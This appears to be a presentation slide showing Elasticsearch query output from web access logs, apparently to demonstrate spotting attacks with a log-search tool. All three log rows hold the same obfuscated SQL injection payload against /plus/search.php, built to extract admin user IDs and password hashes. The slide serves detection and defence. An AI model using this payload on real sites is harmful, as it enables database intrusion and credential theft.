Slide 39
Pipeline Queries
https://github.com/reyjrar/es-utils
= Querying Indexes: lhr4-access-2015.06.03,ams4-access-2015.06.03
@timestamp attack_score src_ip crit dst method resource
2015-06-03T04:20:59+0200 340 107.150.42.90 404 www.booking.com GET /plus/search.php?keyword=as&typeArr[111%3D@`%5C'`)+/*!50000And*/+(/*!50000SeLECT*/+1+/*!50000frOM*/+(/*!50000SeLECT*/+/*!50000Count(*)*/,concat(floor(rand(0)*2),(substring((/*!50000SeLECT*/+CONCAT(0x40,userid,0x7c,substring(pwd,4,16))+from+`%23@__admin`+limit+0,1),1,62)))a+/*!50000fRom*/+information_schema.tables+/*!50000gROUP*/+by+a)b)%23@`%5C'`+]=a
2015-06-03T00:50:43+0200 340 107.150.42.90 404 www.booking.com GET /plus/search.php?keyword=as&typeArr[111%3D@`%5C'`)+/*!50000And*/+(/*!50000SeLECT*/+1+/*!50000frOM*/+(/*!50000SeLECT*/+/*!50000Count(*)*/,concat(floor(rand(0)*2),(substring((/*!50000SeLECT*/+CONCAT(0x40,userid,0x7c,substring(pwd,4,16))+from+`%23@__admin`+limit+0,1),1,62)))a+/*!50000fRom*/+information_schema.tables+/*!50000gROUP*/+by+a)b)%23@`%5C'`+]=a
2015-06-03T05:18:19+0200 340 107.150.42.90 404 www.booking.com GET /plus/search.php?keyword=as&typeArr[111%3D@`%5C'`)+/*!50000And*/+(/*!50000SeLECT*/+1+/*!50000frOM*/+(/*!50000SeLECT*/+/*!50000Count(*)*/,concat(floor(rand(0)*2),(substring((/*!50000SeLECT*/+CONCAT(0x40,userid,0x7c,substring(pwd,4,16))+from+`%23@__admin`+limit+0,1),1,62)))a+/*!50000fRom*/+information_schema.tables+/*!50000gROUP*/+by+a)b)%23@`%5C'`+]=a
# Search Parameters:
# {"terms":{"src_ip":["107.150.42.90","37.59.7.157","74.84.138.120"]}}
# {"query_string":{"query":"dst:www.booking.com"}}
# Displaying 3 of 793 in 0 seconds.
# Indexes (2 of 2) searched: ams4-access-2015.06.03,lhr4-access-2015.06.03